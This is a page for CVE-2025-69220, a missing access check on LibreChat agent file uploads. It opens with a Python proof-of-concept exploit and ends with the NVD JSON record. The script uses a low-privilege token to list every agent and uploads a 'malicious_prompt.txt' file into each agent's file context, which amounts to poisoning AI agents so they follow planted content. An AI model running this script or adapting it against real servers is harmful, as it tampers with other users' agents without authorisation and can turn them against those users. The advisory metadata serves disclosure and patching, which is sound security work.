CVE-2025-69220

import requests import json # CVE-2025-69220 PoC - LibreChat Agent File Upload Access Control Bypass # This PoC demonstrates uploading files to arbitrary agents without proper authorization BASE_URL = "http://target-librechat-server.com" ATTACKER_TOKEN = "your-authenticated-user-token" TARGET_AGENT_ID = "target-agent-id-to-exploit" MALICIOUS_FILE_CONTENT = "Malicious content that will affect agent behavior" def upload_file_to_agent(agent_id, file_content): """ Upload file to agent's file context without authorization check """ url = f"{BASE_URL}/api/agents/{agent_id}/files" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "multipart/form-data" } files = { "file": ("malicious_prompt.txt", file_content, "text/plain") } response = requests.post(url, headers=headers, files=files) return response.status_code, response.text def search_agents_for_ids(): """ Enumerate agent IDs to find target agents """ url = f"{BASE_URL}/api/agents" headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"} response = requests.get(url, headers=headers) if response.status_code == 200: return json.loads(response.text) return [] def exploit(): """ Main exploitation function """ print("[*] Starting CVE-2025-69220 exploitation...") print("[*] Enumerating available agents...") agents = search_agents_for_ids() for agent in agents: agent_id = agent.get("id") print(f"[*] Attempting file upload to agent: {agent_id}") status, resp = upload_file_to_agent(agent_id, MALICIOUS_FILE_CONTENT) if status == 200 or status == 201: print(f"[+] Successfully uploaded file to agent {agent_id}") print(f"[+] Agent behavior may now be modified") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-69220", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:15:59.547", "lastModified": "2026-01-15T21:44:57.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control for file uploads to an agents file context and file search. An authenticated attacker with access to the agent ID can change the behavior of arbitrary agents by uploading new files to the file context or file search, even if they have no permissions for this agent. This issue is fixed in version 0.8.2-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-862"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:-:*:*:*:*:*:*", "matchCriteriaId": "98BB9E92-2D0E-4975-A966-734F3858551B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "8DAB7F45-699A-4383-ABEA-D4374E58EE95"}]}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/284.html", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://cwe.mitre.org/data/definitions/862.html", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/danny-avila/LibreChat/commit/4b9c6ab1cb9de626736de700c7981f38be08d237", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-xcmf-rpmh-hg59", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://owasp.org/Top10/A01_2021-Broken_Access_Control", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema.html", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://raw.githubusercontent.com/OWASP/ASVS/v5.0.0/5.0/OWASP_Application_Security_Verification_Standard_5.0.0_en.pdf", "source": "[email protected]", "tags": ["Technical Description"]}]}}